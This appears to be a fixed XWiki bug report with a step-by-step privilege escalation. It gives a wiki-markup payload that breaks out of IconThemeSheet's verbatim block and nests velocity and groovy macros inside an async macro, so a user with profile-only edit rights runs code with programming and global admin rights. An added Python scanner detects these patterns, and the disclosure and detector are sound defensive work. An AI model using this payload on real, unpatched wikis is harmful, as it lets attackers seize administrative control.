Details
Type: Bug
Resolution: Fixed
Priority: Blocker
Version: 6.2-milestone-1
Description
Steps to reproduce:
- Log in as a user who has only edit rights on their own user profile, enable advanced mode and enable displaying hidden pages.
- Edit the user profile with the wiki editor and insert the following content:
}}}
{{async async="true" cached="false" context="doc.reference"}}
{{velocity}}
Hello World!
#if ($hasProgramming)
I have programming rights!
#end
#if ($hasGlobalAdmin)
I have global admin rights!
#end
{{/velocity}}
{{groovy}}
println("Hello from Groovy!")
{{/groovy}}
{{/async}}
{{{
- Edit the user profile with the object editor and insert an object of type "XWiki Sheet include". Select "IconThemeSheet" as sheet and click "Save & View".
Expected result
The provided input is displayed as-is as the color theme's code.
Actual result
The text
Hello World! I have programming rights! I have global admin rights! Hello from Groovy!
is displayed, showing that we've just executed code with programming and global admin rights.
This demonstrates a privilege escalation from a user with just edit rights on the user profile to global admin and programming rights. The escalation is possible through the combination of two issues:
- The IconThemeSheet includes $doc.content without escaping it, so macros in the user's content are executed in the context of the sheet, which has programming rights.
- The async macro allows circumventing the protection against nested script macros.
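As an added example from the defender's side (not part of this report or of XWiki's code), a small Python scanner that flags, in user-editable wiki content, the two patterns combined here: a }}} that would close a verbatim block a sheet wraps around $doc.content, and a script macro nested inside another macro such as async. The set of script macro names and the two sample inputs are constructed assumptions.

```python
import re

# Added example (not XWiki project code): heuristics for XWiki 2.x content.
SCRIPT_MACROS = {"velocity", "groovy", "python"}  # assumed set of script macros
MACRO_RE = re.compile(r"\{\{(/?)([A-Za-z]+)([^}]*?)(/?)\}\}")
VERBATIM_RE = re.compile(r"\{\{\{|\}\}\}")


def verbatim_breakout(content):
    """True if a '}}}' appears with no '{{{' open before it, so the content
    would close a verbatim block that a sheet wraps around $doc.content."""
    depth = 0
    for tok in VERBATIM_RE.findall(content):
        if tok == "{{{":
            depth += 1
        elif depth == 0:
            return True
        else:
            depth -= 1
    return False


def nested_script_macros(content):
    """Return (script_macro, enclosing_macros) for every script macro that
    sits inside another macro, e.g. {{velocity}} wrapped in {{async}}.
    Verbatim blocks are not excluded, so hits are candidates for review."""
    stack, findings = [], []
    for closing, name, _params, selfclose in MACRO_RE.findall(content):
        name = name.lower()
        if closing:
            while stack and stack.pop() != name:  # unwind to the matching opener
                pass
            continue
        if name in SCRIPT_MACROS and stack:
            findings.append((name, tuple(stack)))
        if not selfclose:
            stack.append(name)
    return findings


# Constructed samples: a trimmed version of the report's payload and a
# harmless profile that uses a script macro at top level only.
PAYLOAD = ('}}} {{async async="true" cached="false" context="doc.reference"}} '
           '{{velocity}} Hello World! {{/velocity}} '
           '{{groovy}} println("Hello from Groovy!") {{/groovy}} {{/async}} {{{')
BENIGN = ('{{velocity}}Hello $xcontext.user{{/velocity}} {{toc/}} '
          '{{{ {{velocity}} shown literally {{/velocity}} }}}')

if __name__ == "__main__":
    for label, text in (("payload", PAYLOAD), ("benign", BENIGN)):
        print(label, verbatim_breakout(text), nested_script_macros(text))
```

The same checks can be run over the content of every document a low-privilege user may edit before a sheet with elevated rights renders it.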
Issue Links
is caused by: XWIKI-10676 Create an Icon Theme Application (Closed)